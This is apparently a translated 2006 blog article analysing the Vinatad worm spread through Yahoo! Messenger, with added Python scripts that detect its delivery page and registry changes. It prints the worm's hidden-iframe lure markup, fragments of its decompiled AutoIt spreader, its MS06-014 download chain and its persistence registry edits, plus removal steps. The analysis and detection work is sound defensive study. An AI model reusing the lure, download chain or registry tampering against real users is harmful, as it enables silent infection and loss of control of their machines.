'Fight' with Vinatad

From yesterday (November 16) until now, even though people have been wary of the "epidemic" of viruses spreading through Y!M, quite a few have been caught by a new virus temporarily named Vinatad! TTO would like to introduce an article about this new virus from the Information Security Blog as a reference for readers.

I did nothing yesterday (and probably all of today) besides sitting in the office helping to troubleshoot the database system. I got home at 11pm, too tired to do anything but sleep, then suddenly remembered that the Vietnam Olympic team played some team today, so I went online to read the news about that match. Just as I was about to go to bed, I received a message on Yahoo! Messenger:

thuong ghe ^, vinatad is hacking you ui, hic :( http:///www.vinatad./index.html

[Picture 1]

I don't like things like this, but this was already the fourth time today that I had received such a message (four different messages, all about this attack). Curious, I clicked on the link and it displayed a message like this:

website has BKAV - That site has security by BKAV
hacked by bkgenetic_g11

Well, this index.html page is not simply those two lines, because NoScript tells me that a script has been blocked. Curious, I looked at its source code and saw the following:

hacked by bkgenetic_g11
<title>website has BKAV - That site has seccurity by BKAV</title>
<iframe name="quag" frameSpacing="0" src="http:///www.free.s.com/iamblackhat/google.html" frameBorder="0" noResize width="0" height="0" target="_self">

There is a hidden iframe pointing to http:///www.free.s.com/iamblackhat/google.html . Looking at the source of google.html: apart from the i.js file that the Freewebs service inserts for banner ads, the whole script is quite interesting. As you can see, the purpose of this script is to download and run the two files http:///www.vinatad./game.exe and http:///www.vinatad./zend.exe . To do that, the author exploits the vulnerability MS06-014:

Vulnerability in the Microsoft Data Access Components (MDAC) Function Could Allow Code Execution (911562)

A remote code execution vulnerability exists in the RDS.Dataspace ActiveX control that is provided as part of the ActiveX Data Objects (ADO) and that is distributed in MDAC. An attacker who successfully exploited this vulnerability could take complete control of the affected system.

Microsoft patched this vulnerability in April 2006, but it is still used heavily in browser-based exploits because it is easy to exploit and, being relatively recent, still works against the many machines that have not been patched. Interestingly, the author uses AJAX technology, through the Microsoft.XMLHTTP object, to silently download the virus onto the victim's computer.

Hearing that this is a made-in-Vietnam virus, you probably guessed that it uses AutoIt to spread over Yahoo! Messenger, as many such specimens have appeared in series recently. What sets this virus apart is that it exploits a vulnerability in Internet Explorer and then uses AJAX to install itself silently. If you have not updated Internet Explorer, simply clicking the link sent over Yahoo! Messenger infects your computer immediately.
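The delivery chain just described (a zero-size hidden iframe on the landing page, then script on the loader page that instantiates the RDS.Dataspace ActiveX control and uses Microsoft.XMLHTTP to pull down an .exe) leaves static traces that a defender can look for in saved pages. The following script is an added example and is not code from the article or from the virus; it parses a saved HTML file and reports hidden iframes, the ActiveX ProgIDs named in the article, and any .exe download target mentioned in script text. The two sample pages are constructed to mirror the structure the article describes, and example.invalid stands in for the real hosts.

```python
"""Static triage of a saved web page for the Vinatad delivery pattern:
a zero-size hidden iframe on the landing page, and script text on the
loader page that instantiates RDS.DataSpace (the MS06-014 vector) or
Microsoft.XMLHTTP and names an .exe to fetch. Added example, not code from
the article; sample pages are constructed, example.invalid is a placeholder."""
import re
from html.parser import HTMLParser

# ProgIDs the article identifies in the exploit page, keyed in lower case.
ACTIVEX_INDICATORS = {
    "rds.dataspace": "RDS.DataSpace ActiveX control (MS06-014)",
    "microsoft.xmlhttp": "Microsoft.XMLHTTP used for silent download",
}
ACTIVEX_RE = re.compile(r'''ActiveXObject\s*\(\s*['"]([^'"]+)['"]''', re.IGNORECASE)
EXE_URL_RE = re.compile(r'''https?://[^\s'"<>]+\.exe''', re.IGNORECASE)


class PageTriage(HTMLParser):
    """Collects (kind, detail) findings while parsing one HTML document."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}  # attribute names arrive lowercased
        if tag == "iframe" and self._is_hidden(a):
            self.findings.append(("hidden-iframe", a.get("src", "")))
        elif tag == "script":
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self._scan_script("".join(self._script_buf))
            self._script_buf = []

    def handle_data(self, data):
        if self._in_script:
            self._script_buf.append(data)

    @staticmethod
    def _is_hidden(a):
        """0x0 dimensions (as in the article's iframe) or CSS hiding."""
        def is_zero(v):
            return v.strip().lower().rstrip("px").strip() == "0"
        if is_zero(a.get("width", "1")) and is_zero(a.get("height", "1")):
            return True
        style = a.get("style", "").replace(" ", "").lower()
        return "display:none" in style or "visibility:hidden" in style

    def _scan_script(self, text):
        for progid in ACTIVEX_RE.findall(text):
            desc = ACTIVEX_INDICATORS.get(progid.lower())
            if desc:
                self.findings.append(("activex", desc))
        for url in EXE_URL_RE.findall(text):
            self.findings.append(("exe-download", url))


def triage(html):
    """Return the list of (kind, detail) findings for one saved page."""
    p = PageTriage()
    p.feed(html)
    p.close()
    return p.findings


# Constructed sample pages; only the shape of the article's pages is kept.
LANDING_PAGE = """<html><head>
<title>website has BKAV - That site has security by BKAV</title></head>
<body>hacked by bkgenetic_g11
<iframe name="quag" frameSpacing="0" src="http://example.invalid/iamblackhat/google.html"
 frameBorder="0" noResize width="0" height="0" target="_self"></iframe>
</body></html>"""

LOADER_PAGE = """<html><body><script>
// constructed: only the object names and the download target, nothing that runs
var ds = new ActiveXObject("RDS.DataSpace");
var xh = new ActiveXObject("Microsoft.XMLHTTP");
var target = "http://example.invalid/game.exe";
</script></body></html>"""

if __name__ == "__main__":
    for name, page in (("landing", LANDING_PAGE), ("loader", LOADER_PAGE)):
        for kind, detail in triage(page):
            print(f"{name}: {kind}: {detail}")
```

Run it against a page saved with "View Source" rather than a live fetch, so nothing is executed; a finding of a hidden iframe whose src is on another host, followed by RDS.DataSpace on the framed page, is exactly the pattern the article walks through.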

I quickly downloaded the two files http:///www.vinatad./zend.exe and http:///www.vinatad./game.exe . The VirusTotal scan results are as follows:

Antivirus           Version         Update       Result
AntiVir             7.2.0.39        11.16.2006   no virus found
Authentium          4.93.8          11.16.2006   no virus found
Avast               4.7.892.0       11.15.2006   no virus found
AVG                 386             11.15.2006   no virus found
BitDefender         7.2             11.16.2006   no virus found
CAT-QuickHeal       8.00            11.15.2006   TrojanDownloader.Agent.axn
ClamAV              devel-20060426  11.16.2006   no virus found
DrWeb               4.33            11.16.2006   no virus found
eTrust-InoculateIT  23.73.57        11.16.2006   no virus found
eTrust-Vet          30.3.3195       11.16.2006   no virus found
Ewido               4.0             11.15.2006   no virus found
Fortinet            2.82.0.0        11.16.2006   no virus found
F-Prot              3.16f           11.16.2006   no virus found
F-Prot4             4.2.1.29        11.16.2006   no virus found
Ikarus              0.2.65.0        11.15.2006   no virus found
Kaspersky           4.0.2.24        11.16.2006   no virus found
McAfee              4896            11.15.2006   no virus found
Microsoft           1.1609          11.16.2006   no virus found
NOD32v2             1868            11.15.2006   no virus found
Norman              5.80.02         11.15.2006   no virus found
Panda               9.0.0.4         11.15.2006   no virus found
Prevx1              V2              11.16.2006   no virus found
Sophos              4.11.0          11.15.2006   no virus found
TheHacker           6.0.1.119       11.15.2006   Trojan/Downloader.AutoIt.e
UNA                 1.83            11.15.2006   Backdoor.Agent.9
VBA32               3.11.1          11.15.2006   no virus found
VirusBuster         4.3.15:9        11.15.2006   no virus found

Only three antivirus engines identified game.exe and zend.exe. A preliminary analysis of the strings shows that both files use the AutoIt engine and are packed with UPX. I unpacked them and loaded them onto a VMware virtual machine running Windows XP Service Pack 2. Decompiling the AutoIt source code of both is easy because they use no protection at all; simply running AutoIt's existing Exe2Aut program put their source code in my hands:

; AUT2EXE VERSION: 3.2.0.1
; ----------------------------------------------------------------------------
; AUT2EXE INCLUDE-START: E: hoc tapnewhackdungyeuanh_mophatTeachokRungame.au3
; ----------------------------------------------------------------------------
; ------------------------------------------------
; Software: DKC Bot
; Version: 1.1
; Purpose: Advertise a website through Y!M
; Completed: September 1, 2006
; ------------------------------------------------

My first impression is that these two AutoIt scripts are simpler than the other AutoIt specimens I have met before. The source code of zend.exe is only 3 lines:

While (99999999)
    Ping("localhost", 1)   ; busy loop: ping localhost with a 1 ms timeout, forever
WEnd

The source code of game.exe is quite "classic", divided into sections such as:

; Setup
#NoTrayIcon
$trinhduyet = "hacked by bkgenetic_g11"
$ngaunhien = Random(0, 9, 1)   ; random integer 0..9, used to pick a message below
; Random website
Dim $web[10]
$website = "http:///www.vinatad./index.html"
$include = "http:///www.vinatad./hotline.html"
; Random message
Dim $tin[10]
$tin[0] = "that site hacked by bkgenetic_g11 via nutrition, phuc that, hic" & $website
$tin[1] = "thuong ghe ^, vinatad is hacked you ui, hic :(" & $website
$tin[2] = "This is a poet's hand, hic :(" & $website
$tin[3] = "Den chiu, vinatad ca bi hack, VNiss lam ma ??? :))" & $website
$tin[4] = "bun ghe, hack hui rui ^" & $website
$tin[5] = "that site hacked by bkgenetic_g11 via nutrition, phuc that, hic)" & $website
$tin[6] = "Den chiu, no gi de noi :))))" & $website
$tin[7] = "thuong ghe ^, vinatad bi hack you ui, hi :))" & $website
$tin[8] = "en chiu, vinatad ca bi hack, VNiss lam ma ?? :(" & $website
$tin[9] = "en chiu, vinatad ca bi hack, VNiss lam ma ?? :(" & $website
$tinnhan = $tin[$ngaunhien]
; Infect the system
; Write the Registry
; Change status & send messages

When infecting the system, game.exe copies itself to the file C:\Windows\taskmng.exe . It then changes several Registry settings in order to:

- Automatically run when Windows starts

- Modify the homepage of Internet Explorer

- Disable regedit tool and Task Manager

- Modify the Launchcast address of Yahoo! Messenger

Finally, as usual, it begins to spread by sending mass messages via Yahoo! Messenger and changing the status of infected users.

Although this virus is not very dangerous, its author could easily replace game.exe or zend.exe with far more powerful versions, either written in AutoIt or adapted from the virus and bot source code that is plentiful on the Internet. Then, with the help of Yahoo! Messenger and the vulnerabilities in Internet Explorer, a disaster is entirely possible. How to protect yourself? Keep Internet Explorer patched, and Firefox + NoScript is a viable solution.

How to "delete" Vinatad from your computer

1. Close Yahoo! Messenger and Internet Explorer

2. Delete C:\WINDOWS\taskmng.exe

3. Fix the registry (remove or reset the following values)

HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel "Homepage" = ([REG_DWORD, value: 00000001])

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "DisableTaskMgr" = ([REG_DWORD, value: 00000001])

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System "DisableRegistryTools" = ([REG_DWORD, value: 00000001])

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main "Start Page" = (http:///www.vinatad./index.html)

HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz "content url" = (http:///www.vinatad./hotline.html)

HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_Launc

4. Restart the computer
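Because the virus disables regedit, the registry changes listed above (and in the infection description earlier) are awkward to check on the infected machine itself. The following script is an added example, not code from the article: it takes a registry export made on the suspect machine (for example with `reg export HKCU hkcu.reg`), parses it offline, flags the policy DWORDs set to 1, the IE start page and Yahoo! Messenger content URL redirected to the virus's site, and an autorun entry for the dropped taskmng.exe, then writes a .reg fragment that deletes the policy and autorun values. The article does not say which autorun location game.exe uses, so looking in the standard Run key is an assumption of this example; SAMPLE_EXPORT is constructed, and example.invalid stands in for the virus's real host.

```python
"""Offline triage of a registry export for the changes game.exe makes, as
listed in the article: policy DWORDs set to 1, IE start page and the Y!M
content URL pointed at the virus's site, and an autorun for taskmng.exe.
Added example, not code from the article. SAMPLE_EXPORT is constructed;
example.invalid is a placeholder for the real host."""
import re

# Policy DWORDs the article says the virus sets to 1: (key, value name).
POLICY_DWORDS = {
    (r"HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel", "Homepage"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr"),
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableRegistryTools"),
}
# String values the article says are redirected to the virus's site.
URL_VALUES = {
    (r"HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main", "Start Page"),
    (r"HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz", "content url"),
}
# The article names the dropped file but not the autorun location; checking
# the standard Run key for it is an assumption of this example.
RUN_KEY_RE = re.compile(r"\\CurrentVersion\\Run$", re.IGNORECASE)
DROPPED_FILE = "taskmng.exe"


def _norm(key, name):
    return key.lower(), name.lower()


POLICY_DWORDS = {_norm(k, n) for k, n in POLICY_DWORDS}
URL_VALUES = {_norm(k, n) for k, n in URL_VALUES}


def parse_reg(text):
    """Parse .reg export text into {key: {value_name: (type, data)}}.
    Handles dword: and quoted string values; other types are kept verbatim
    and multi-line hex continuations are not joined (not needed here)."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if (not line or line.startswith(";") or line.startswith("Windows Registry Editor")
                or line.upper().startswith("REGEDIT")):
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            keys.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, _, data = line.partition("=")
        name = name.strip().strip('"') or "@"
        data = data.strip()
        if data.startswith("dword:"):
            keys[current][name] = ("REG_DWORD", int(data[6:], 16))
        elif len(data) >= 2 and data[0] == data[-1] == '"':
            # .reg escapes backslash and quote inside string data
            keys[current][name] = ("REG_SZ", data[1:-1].replace('\\\\', '\\').replace('\\"', '"'))
        else:
            keys[current][name] = ("OTHER", data)
    return keys


def triage(keys, suspect_hosts):
    """Return (key, value name, reason) for every indicator found."""
    hosts = [h.lower() for h in suspect_hosts]
    findings = []
    for key, values in keys.items():
        for name, (vtype, data) in values.items():
            ident = _norm(key, name)
            if ident in POLICY_DWORDS and vtype == "REG_DWORD" and data == 1:
                findings.append((key, name, "policy value set to 1"))
            elif (ident in URL_VALUES and vtype == "REG_SZ"
                  and any(h in data.lower() for h in hosts)):
                findings.append((key, name, "points at suspect host: " + data))
            elif RUN_KEY_RE.search(key) and vtype == "REG_SZ" and DROPPED_FILE in data.lower():
                findings.append((key, name, "autorun of dropped file: " + data))
    return findings


def render_fix_reg(findings):
    """Build .reg text deleting the policy and autorun values found
    ("name"=- deletes a value). Redirected URLs are emitted as comments,
    since the right replacement is the user's own original setting."""
    lines = ["Windows Registry Editor Version 5.00", ""]
    for key, name, reason in findings:
        if reason.startswith("points at"):
            lines.append(f'; review manually: [{key}] "{name}" {reason}')
        else:
            lines += [f"[{key}]", f'"{name}"=-', ""]
    return "\n".join(lines)


# Constructed export mimicking an infected HKCU; ctfmon.exe is a benign decoy.
SAMPLE_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"ctfmon.exe"="C:\\WINDOWS\\system32\\ctfmon.exe"
"taskmng"="C:\\WINDOWS\\taskmng.exe"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]
"DisableTaskMgr"=dword:00000001
"DisableRegistryTools"=dword:00000001

[HKEY_CURRENT_USER\Software\Policies\Microsoft\Internet Explorer\Control Panel]
"Homepage"=dword:00000001

[HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main]
"Start Page"="http://example.invalid/index.html"

[HKEY_CURRENT_USER\Software\Yahoo\pager\View\YMSGR_buzz]
"content url"="http://example.invalid/hotline.html"
"""

if __name__ == "__main__":
    found = triage(parse_reg(SAMPLE_EXPORT), ["example.invalid"])
    for key, name, reason in found:
        print(f'[{key}] "{name}": {reason}')
    print(render_fix_reg(found))
```

Deleting the two policy values under Policies\System is what restores Task Manager and regedit; the generated .reg leaves the Start Page and Yahoo! Messenger URLs for manual review rather than guessing a replacement.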

According to Pastepin